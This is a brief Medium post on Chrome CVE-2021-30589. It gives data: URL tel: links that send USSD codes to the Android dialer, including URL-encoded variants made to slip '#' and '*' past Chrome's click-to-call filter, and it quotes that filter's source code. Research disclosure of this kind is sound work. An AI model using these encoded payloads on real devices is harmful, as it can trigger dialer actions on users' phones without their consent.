USSD Hacks aren’t patched, you can still play around with it. (Google Chrome Research-CVE-2021–30589)

data:text/html,<a href="tel:*#06#">clickhere</a> /// USSD code to open IMEI Number
#->%23
data:text/html,<a href="tel:*%252306%2523">Click Me</a> /// USSD Code to open IMEI Number
data:text/html,<a href="tel:"*%252307%2523">Click Me</a> /// To open test history

bool IsUrlSafeForClickToCall(const GURL& url) {
// Get the unescaped content as this is what we’ll end up sending to the
// Android dialer.
std::string unescaped = GetUnescapedURLContent(url);
// We don’t allow any number that contains any of these characters as they
// might be used to create USSD codes.
return !unescaped.empty() &&
std::none_of(unescaped.begin(), unescaped.end(),
[](char c) { return c == ‘#’ || c == ‘*’ || c == ‘%’; });
Screenshot from chrome://flags

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Globstake | The World’s most Advanced and proven DEFI Staking Program

Next Generation Of Virtual World — On Metaverse

IsoWallet Whitepaper

IsoWallet Competition Matrix

How I Hacked A Hotel Just Using My Phone

Creating a IT Sec risk management program (Part 1)

2 Must Use Browser Alternatives For Android Smart-phones

5-STEP GUIDE TO PORTSWIGGER WEB SECURITY’S GRAPHICAL TOOL BURP

Cyber security is a hot spot

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
KirtiKumar Anandrao Ramchandani

KirtiKumar Anandrao Ramchandani

More from Medium

The suggested growth strategy that for Disney+ hotstar

Director Ahuja’s Remarks to the Chief Human Capital Officers Council

What will future bring?

A shopping list of a stressful day